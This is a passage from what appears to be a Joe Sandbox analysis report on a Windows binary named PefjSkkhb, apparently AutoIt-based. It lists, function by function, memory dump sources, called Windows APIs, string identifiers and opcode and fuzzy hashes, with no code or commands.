                                                                      • Instruction Fuzzy Hash: 6D91D022B58A5A82EB24BF6584405B9A3A2BF147A0F944531DE2DD37D4DF3DF853C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction ID: 7dbc6f2817d8b0099b35e63a6e39592d03b36ab4d99cf0d6066cf588e79f81fd
                                                                      • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction Fuzzy Hash: B491AE26B48B4685EB10FF65E0402ADB369FB88BE8B854432DE5D93755DF38F845C3A0
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00007FF7C0EC0EDB
                                                                        • Part of subcall function 00007FF7C0EC0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7C0EC0F61), ref: 00007FF7C0EC0C6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharForegroundUpperWindow
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 3570115564-1994484594
                                                                      • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction ID: 9787e4e6724dc56ec1e4837bbfb4b1a652f0effabeb015c0225792731e46c8f2
                                                                      • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction Fuzzy Hash: 1071C222B8CA4281EE64BF64D4112B9E2A1AF55BA4FC44431CA0DC6391EF3EF58483E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction ID: 47c6d24f3c4059ca833e7f4521ba5e6cfbbe246706d509a433815f0f528dadd2
                                                                      • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction Fuzzy Hash: 2A41C732F59A5341EB607F258448179E2D1ABA4BF4B940635CA5EC37D4EF3EF84283A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: #$E$O
                                                                      • API String ID: 3215553584-248080428
                                                                      • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                      • Instruction ID: b0e9ecfdb839fc3b649df9cd56f8ac3928e0ab018a38a4d4e697aa99a068cee7
                                                                      • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                      • Instruction Fuzzy Hash: AC41C032E59B9184EF51BF6998401A9A3A0BF54BA8F884231EE4D87798DF3DF441C360
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                      • String ID: \*.*
                                                                      • API String ID: 3196045410-1173974218
                                                                      • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction ID: 4444a4bde73243c5bb1e6750ebc95549b51b41e1d72ee999013141d904e30c2b
                                                                      • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction Fuzzy Hash: 71413122A4869395EB20FF24D8401FDA764FF95798FC40131DA4DD3B99EF29E509C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 787153527-1403004172
                                                                      • Opcode ID: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                      • Instruction ID: 7910d1cce8eb17c6685bec28ef9d96baeae43707be3125bf6fa75daebbb79115
                                                                      • Opcode Fuzzy Hash: 50f1d75fbf58418a8b746d3a4e6e520a523a5a635b2cd0adfcd1e093ce64af6b
                                                                      • Instruction Fuzzy Hash: BE31D122A4DA4286EA20FF11E4401B9E360FB85BA0FC44631DE4D87795DF3CF645C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                      • Instruction ID: 4f965eee0425c2c3c0cd05192dd76e5d63c016db45fcbc00fddec43cfcc4f05d
                                                                      • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                      • Instruction Fuzzy Hash: 9031C622A5C74242FB60BF11A414ABEA750FB84BA4F985131DE4D97B45DF3CE4428790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction ID: 0e4f6813c76824fde90897d7b294ba7f8b63b261c42c42af6ece49a2909c4cc8
                                                                      • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction Fuzzy Hash: 8931503260D781CAE761AF24E44476AB3A1FB85BA0F944135DA9987B94DF3CE484CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction ID: c30e02cafb01ea3d0a8f6deac139e67b710b03a1df72f7263d72ed753a11f55b
                                                                      • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction Fuzzy Hash: 55F04431A1EA4281EF45BF15E458279A3A1FF88BA4FC45035E90F86754DF7CE484C750
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction ID: 375e6776aa2ceeacdb92e16c6a900410c479ff944a7c743b59f08709aef78ca7
                                                                      • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction Fuzzy Hash: E6A11562B4878246FB60BF6092103F9E695AF00BB4F984636DA1D877E5DF7CF44483A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2227131780-0
                                                                      • Opcode ID: 6d4788a4abc5ce2114f5ac25091d31e77d7f9f094256cfd739c645a6feeb5206
                                                                      • Instruction ID: 4e96ac3b9e3839a1e5d0d76b78cff09fac83fe2288e9c8f28bb2492707fd4052
                                                                      • Opcode Fuzzy Hash: 6d4788a4abc5ce2114f5ac25091d31e77d7f9f094256cfd739c645a6feeb5206
                                                                      • Instruction Fuzzy Hash: DBA1B562B58A4282DB54FF26D4502BEE790BF85BA4F804531DA5E87796DF3CF50087A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction ID: 5e03b8dfbafe07b81a152ebd483591bf735712fe5271afa7d8cb400929682e93
                                                                      • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction Fuzzy Hash: 6881AE26B48A9186EB14FF22D4546ADB7A0BB48FE4F854035DE1E97796CF3CE401C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction ID: 21b65106e2d1ee2ea3857d1a9020f4ee5ed8766ebd9ee1e2577addb9bcce9ca0
                                                                      • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction Fuzzy Hash: 3881C122B9869285F720BF6994406BDA7A1BB44B68F804235DE0E9B7D5CF3CF445C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3451389628-0
                                                                      • Opcode ID: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                      • Instruction ID: 8deb65904438bec9908d6a848b8a952b88d29dc5194fea9e58c6c6151d02ee70
                                                                      • Opcode Fuzzy Hash: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                      • Instruction Fuzzy Hash: E5714E72B58A4289EB10FF65D0903BC6770FB84BA8F818531DA0D97B96DF38E145C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 3659116390-0
                                                                      • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction ID: 6cd4e21c1839f2a7fb5e37a32509f498e41895d65c4e04d945aa003040507692
                                                                      • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction Fuzzy Hash: E651D632A18A9189F714EF69D4443ADB7B0FB44BA8F488235CE4E8B798DF38E145C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3740051246-0
                                                                      • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                      • Instruction ID: 5785070a094344b0af3ebc130e26eb1432deab02e0bde569fd5cec4b819015bb
                                                                      • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                      • Instruction Fuzzy Hash: 01617E72A58A8285EB10FF65D4843BDA770FB847A8F804131DA4D87766DF7CE145C7A0
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED176
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED217
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED236
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED281
                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED2A0
                                                                        • Part of subcall function 00007FF7C0E74120: WideCharToMultiByte.KERNEL32 ref: 00007FF7C0E74160
                                                                        • Part of subcall function 00007FF7C0E74120: WideCharToMultiByte.KERNEL32 ref: 00007FF7C0E7419C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction ID: 60a72704dad53315ebed8ffea0ebf5e21f0160e2037c9a929666cf2b1258eb4e
                                                                      • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction Fuzzy Hash: 2E513836B58F1685EF00FF56D8841ACA374FB88BA4B854432DE5E87365DF38E44183A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
